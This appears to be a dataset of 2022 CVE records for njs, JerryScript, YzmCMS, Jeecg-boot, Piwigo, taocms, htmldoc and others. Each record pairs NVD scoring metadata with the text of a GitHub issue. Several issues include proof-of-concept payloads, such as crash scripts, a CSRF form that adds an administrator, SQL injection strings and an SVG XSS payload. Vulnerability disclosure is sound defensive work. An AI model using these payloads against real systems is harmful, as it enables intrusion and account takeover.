{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/nginx/njs/commit/39e8fa1b7db1680654527f8fa0e9ee93b334ecba" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "2DADC4D6-538B-4AC7-97B5-022B11495692", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null...
https://github.com/nginx/njs/issues/449
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ``` Version : 0.7.0 Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548 OS : Ubuntu 20.04 Configure : ./configure --address-sanitizer=YES ``` ## POC ``` function main() { const v3 = [23490,23490,23490,23490]; const v4 = {}; v3.length = 1577595327; const v9 = Object.appl...
SEGV /njs/src/njs_object.c:2136:24 in njs_object_set_prototype
https://api.github.com/repos/nginx/njs/issues/449/comments
2
2021-12-24T06:28:54Z
2022-02-15T20:34:51Z
https://github.com/nginx/njs/issues/449
1,088,182,618
449
CVE-2021-46463
2022-02-14T22:15:07.793
njs through 0.7.1, used in NGINX, was discovered to contain a control flow hijack caused by a Type Confusion vulnerability in njs_promise_perform_then().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/6a40a85ff239497c6458c7dbef18f6a2736fe992" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "2DADC4D6-538B-4AC7-97B5-022B11495692", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null...
https://github.com/nginx/njs/issues/447
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ```cpp Version : 0.7.0 Git Commit : bb796f7b3f3b65a78248f3ba86d0929eb292ca8e OS : Ubuntu 20.04 Configure : ./Configure --address-sanitizer=YES ``` ## Poc ```cpp function main() { function v0(v1,v2) { return 1 } var o = [1,2,3,4,5,6] const v1 = new Promise(v0); ...
Control flow hijack caused by Type Confusion of Promise object
https://api.github.com/repos/nginx/njs/issues/447/comments
1
2021-12-20T05:07:22Z
2022-02-15T20:37:16Z
https://github.com/nginx/njs/issues/447
1,084,365,523
447
CVE-2022-25139
2022-02-14T22:15:08.317
njs through 0.7.0, used in NGINX, was discovered to contain a heap use-after-free in njs_await_fulfilled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/6a07c2156a07ef307b6dcf3c2ca8571a5f1af7a6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "98ABF5F9-B5AA-4A73-B525-5B89AE6BEA3E", "versionEndExcluding": "0.7.2", "versionEndIncluding": null, "versionStartExcluding": null...
https://github.com/nginx/njs/issues/451
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ``` Version : 0.7.0 Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548 OS : Ubuntu 20.04 Configure : ./configure --address-sanitizer=YES ``` ## POC ``` function main() { async function v6(v7) { const v10 = v7(v7); const v11 = await "split"; Object.values();...
Heap UAF in njs_await_fulfilled
https://api.github.com/repos/nginx/njs/issues/451/comments
3
2021-12-24T06:48:19Z
2022-03-23T04:33:21Z
https://github.com/nginx/njs/issues/451
1,088,190,381
451
CVE-2022-23384
2022-02-15T13:15:07.680
YzmCMS v6.3 is affected by Cross Site Request Forgery (CSRF) in /admin.add
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/58" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/yzmcms/yzmcms/issues/58
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
After the administrator logged in, open the following one page admin,add. http://local:8080/yzmcms-v6.3/admin/ / <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://169.254.238.255/yzmcms-v6.3/yzmcms-v6.3/admi...
There is one CSRF vulnerability that can add the administrator account
https://api.github.com/repos/yzmcms/yzmcms/issues/58/comments
1
2022-01-16T14:50:07Z
2022-02-14T02:54:19Z
https://github.com/yzmcms/yzmcms/issues/58
1,105,072,186
58
CVE-2022-22880
2022-02-16T22:15:07.677
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /jeecg-boot/sys/user/queryUserByDepId.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3347" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6D5281A-1578-443B-921C-0CE7B9B36BA4", "versionEndExcluding": null, "versionEndIncluding": "3.0", "versionStartExcludin...
https://github.com/jeecgboot/jeecg-boot/issues/3347
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: <=3.0 ##### 问题描述: After testing, it is found that the code parameter of /jeecg-boot/sys/user/queryUserByDepId interface of jeecg-boot has SQL injection ##### 截图&代码: payload:/jeecg-boot/sys/user/queryUserByDepId?_t=1641263644&id=57197590443c44f083d42ae24ef26a2c&realname=%64%61%73%64%27%20%75%6e%69%6f...
SQL injection exists in /jeecg-boot/sys/user/queryUserByDepId
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3347/comments
2
2022-01-04T06:28:26Z
2022-01-18T02:56:58Z
https://github.com/jeecgboot/JeecgBoot/issues/3347
1,093,051,129
3,347
CVE-2022-22881
2022-02-16T22:15:07.723
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /sys/user/queryUserComponentData.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3348" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6D5281A-1578-443B-921C-0CE7B9B36BA4", "versionEndExcluding": null, "versionEndIncluding": "3.0", "versionStartExcludin...
https://github.com/jeecgboot/jeecg-boot/issues/3348
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: jeecg-boot<=3.0 ##### 问题描述: After testing, it is found that the code parameter of /sys/user/queryUserComponentData interface of jeecg-boot has SQL injection Reuse https://github.com/jeecgboot/jeecg-boot After the source code of the project starts the project, click "custom component" and grab the pac...
SQL injection exists in /sys/user/queryUserComponentData
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3348/comments
3
2022-01-04T08:36:23Z
2022-02-21T13:29:22Z
https://github.com/jeecgboot/JeecgBoot/issues/3348
1,093,125,235
3,348
CVE-2022-22901
2022-02-17T03:15:06.847
There is an Assertion in 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at parser_parse_function_arguments in /js/js-parser.c of JerryScript commit a6ab5e9.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable", "URL Repurposed" ], "url": "http://jerryscript.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript" }, {...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*", "matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
https://github.com/jerryscript-project/jerryscript/issues/4916
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
##### JerryScript commit hash `a6ab5e9` ##### Build platform Ubuntu 20.04 LTS ##### Build steps ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es2015-subset --stack-limit=15 --debug --logging=on --line-info=on ##### poc ```js function test(proxyTarget) { v...
Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/ubuntu/fuzz/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1618
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4916/comments
0
2022-01-02T19:10:38Z
2022-05-21T14:30:43Z
https://github.com/jerryscript-project/jerryscript/issues/4916
1,092,081,853
4,916
CVE-2021-46700
2022-02-19T19:15:10.960
In libsixel 1.8.6, sixel_encoder_output_without_macro (called from sixel_encoder_encode_frame in encoder.c) has a double free.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
https://github.com/saitoha/libsixel/issues/158
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Hi, I found a double free or corruption in the current master 6a5be8b, OS: ubuntu 18.04 kernel: 5.4.0-87-generic POC: [poc.zip](https://github.com/saitoha/libsixel/files/7492167/poc.zip) ![image](https://user-images.githubusercontent.com/23655229/140643369-d02accea-8d38-484c-b2d1-8788a6ff0dbf.png) - gdb ...
double free or corruption in encoder.c:831
https://api.github.com/repos/saitoha/libsixel/issues/158/comments
1
2021-11-07T11:26:43Z
2024-05-04T16:25:26Z
https://github.com/saitoha/libsixel/issues/158
1,046,721,863
158
CVE-2021-44607
2022-02-24T15:15:24.237
A Cross Site Scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 in the Assets page via an SVG file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/589" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D", "versionEndExcluding": null, "versionEndIncluding": null, "version...
https://github.com/daylightstudio/FUEL-CMS/issues/589
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack 1. login as admin .in the Assets page ...
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/589/comments
0
2021-11-29T15:19:12Z
2021-11-29T15:19:12Z
https://github.com/daylightstudio/FUEL-CMS/issues/589
1,066,165,915
589
CVE-2022-24620
2022-02-24T15:15:29.830
Piwigo version 12.2.0 is vulnerable to stored cross-site scripting (XSS), which can lead to privilege escalation. In this way, admin can steal webmaster's cookies to get the webmaster's access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:12.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "81C2A86F-D640-455A-915C-B187ECB741AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/Piwigo/Piwigo/issues/1605
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi, I found Stored XSS in Piwigo version 12.2.0 (Not tested older versions). **Proof Of Concept**: 1. Add an admin through webmaster's access. 2. Through the admin account open http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list 3. Add < svg onload=alert(1)> (Remove space) in the group name field. ...
Piwigo-12.2.0 Vulnerable For Stored XSS Which Is Leading To Privilege Escalation
https://api.github.com/repos/Piwigo/Piwigo/issues/1605/comments
3
2022-02-02T19:14:54Z
2022-07-05T16:00:16Z
https://github.com/Piwigo/Piwigo/issues/1605
1,122,294,432
1,605
CVE-2021-3596
2022-02-24T19:15:09.063
A NULL pointer dereference flaw was found in ImageMagick in versions prior to 7.0.10-31 in ReadSVGImage() in coders/svg.c. This issue is due to not checking the return value from libxml2's xmlCreatePushParserCtxt() and uses the value directly, which leads to a crash and segmentation fault.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970569" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "5C99ED1A-DE49-4F83-B109-EE35F50E1717", "versionEndExcluding": "7.0.10-31", "versionEndIncluding": null, "version...
https://github.com/ImageMagick/ImageMagick/issues/2624
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [Y ] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues t...
Null Pointer dereference caused by incomplete check of the return value from libxml2 in ReadSVGImage svg.c:3621
https://api.github.com/repos/ImageMagick/ImageMagick/issues/2624/comments
1
2020-09-25T05:56:46Z
2020-09-25T18:07:35Z
https://github.com/ImageMagick/ImageMagick/issues/2624
708,663,828
2,624
CVE-2021-4021
2022-02-24T19:15:09.533
A vulnerability was found in Radare2 in versions prior to 5.6.2, 5.6.0, 5.5.4 and 5.5.2. Mapping a huge section filled with zeros of an ELF64 binary for MIPS architecture can lead to uncontrolled resource consumption and DoS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/19436" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "C7E4E86C-9AD4-46E6-8403-6424D989E389", "versionEndExcluding": null, "versionEndIncluding": "5.5.0", "versionStartExcludin...
https://github.com/radareorg/radare2/issues/19436
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
## Environment ``` $ date mar 23 nov 2021 10:31:32 -03 $ r2 -v radare2 5.5.0 1 @ linux-x86-64 git. commit: b50c2c35acd266f1b18bbbcfe0c63d9d0331b09d build: 2021-11-14__22:46:21 $ uname -ms Linux x86_64 ``` ## Description We found with @OctavioGalland an ELF64 binary for MIPS architecture that hangs when ana...
DoS analysing ELF64 binary for MIPS architecture
https://api.github.com/repos/radareorg/radare2/issues/19436/comments
3
2021-11-23T14:42:29Z
2021-12-03T00:57:37Z
https://github.com/radareorg/radare2/issues/19436
1,061,367,190
19,436
CVE-2022-23380
2022-03-01T14:15:07.820
There is a SQL injection vulnerability in the background of taocms 3.0.2 in parameter id:action=admin&id=2&ctrl=edit.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
![20220116015744](https://user-images.githubusercontent.com/46486374/149633033-32c2dfd1-bc79-46a1-96c8-a05e1873985c.jpg) ![20220116015609](https://user-images.githubusercontent.com/46486374/149633040-9d78fd1a-3df2-4c0b-bc2b-71ea3aa5727e.jpg) ``` GET /admin/admin.php?action=admin&id=2+and(sleep(5))--+&ctrl=edit...
There is SQL blind injection at "Admin Edit"
https://api.github.com/repos/taogogo/taocms/issues/16/comments
0
2022-01-15T18:16:58Z
2022-01-16T03:13:12Z
https://github.com/taogogo/taocms/issues/16
1,104,805,848
16
CVE-2022-23387
2022-03-01T17:15:08.120
An issue was discovered in taocms 3.0.2. This is a SQL blind injection that can obtain database data through the Comment Update field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taocms:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "98036B99-8DC6-4F7F-9450-763A199E6148", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/taogogo/taocms/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
``` POST /admin/admin.php HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8...
There is SQL blind injection at "Comment Update"
https://api.github.com/repos/taogogo/taocms/issues/23/comments
0
2022-01-17T02:51:41Z
2022-01-17T02:51:41Z
https://github.com/taogogo/taocms/issues/23
1,105,307,017
23
CVE-2021-23180
2022-03-02T23:15:08.283
A flaw was found in htmldoc in v1.9.12 and before. Null pointer dereference in file_extension(),in file.c may lead to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967041" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionSta...
https://github.com/michaelrsweet/htmldoc/issues/418
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found aSEGV in file_extension function in file.c:337:29 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc8.html poc(zipped for up...
AddressSanitizer: SEGV in file_extension file.c:337:29
https://api.github.com/repos/michaelrsweet/htmldoc/issues/418/comments
2
2021-01-26T09:02:25Z
2022-03-11T05:20:30Z
https://github.com/michaelrsweet/htmldoc/issues/418
794,056,743
418
CVE-2021-23191
2022-03-02T23:15:08.347
A security issue was found in htmldoc v1.9.12 and before. A NULL pointer dereference in the function image_load_jpeg() in image.cxx may result in denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967022" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionSta...
https://github.com/michaelrsweet/htmldoc/issues/415
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found SEGV on unknown address test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf poc4.html ``` poc(zipped for update): [poc4.zip]...
AddressSanitizer: SEGV on unknown address 0x000000000014
https://api.github.com/repos/michaelrsweet/htmldoc/issues/415/comments
7
2021-01-26T08:50:41Z
2022-03-11T05:12:06Z
https://github.com/michaelrsweet/htmldoc/issues/415
794,049,235
415
CVE-2021-23206
2022-03-02T23:15:08.460
A flaw was found in htmldoc in v1.9.12 and prior. A stack buffer overflow in parse_table() in ps-pdf.cxx may lead to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967028" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionSta...
https://github.com/michaelrsweet/htmldoc/issues/416
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a stack-buffer-overflow in parse_table() ps-pdf.cxx:6611:25 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf poc6.html ```...
AddressSanitizer: stack-buffer-overflow in parse_table ps-pdf.cxx:6611:25
https://api.github.com/repos/michaelrsweet/htmldoc/issues/416/comments
3
2021-01-26T08:54:36Z
2022-03-11T05:14:48Z
https://github.com/michaelrsweet/htmldoc/issues/416
794,051,710
416
CVE-2021-26259
2022-03-03T23:15:08.033
A flaw was found in htmldoc in v1.9.12. Heap buffer overflow in render_table_row(),in ps-pdf.cxx may lead to arbitrary code execution and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/0ddab26a542c74770317b622e985c52430092ba5" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.12:*:*:*:*:*:*:*", "matchCriteriaId": "645554AD-DA7C-4B11-864A-89F423B08291", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
https://github.com/michaelrsweet/htmldoc/issues/417
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a heap-buffer-overflow in the render_table_row() ps-pdf.cxx:6123:34 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc7.html p...
AddressSanitizer: heap-buffer-overflow on render_table_row() ps-pdf.cxx:6123:34
https://api.github.com/repos/michaelrsweet/htmldoc/issues/417/comments
3
2021-01-26T08:58:27Z
2022-03-11T05:17:23Z
https://github.com/michaelrsweet/htmldoc/issues/417
794,054,116
417
CVE-2021-26948
2022-03-03T23:15:08.090
Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.
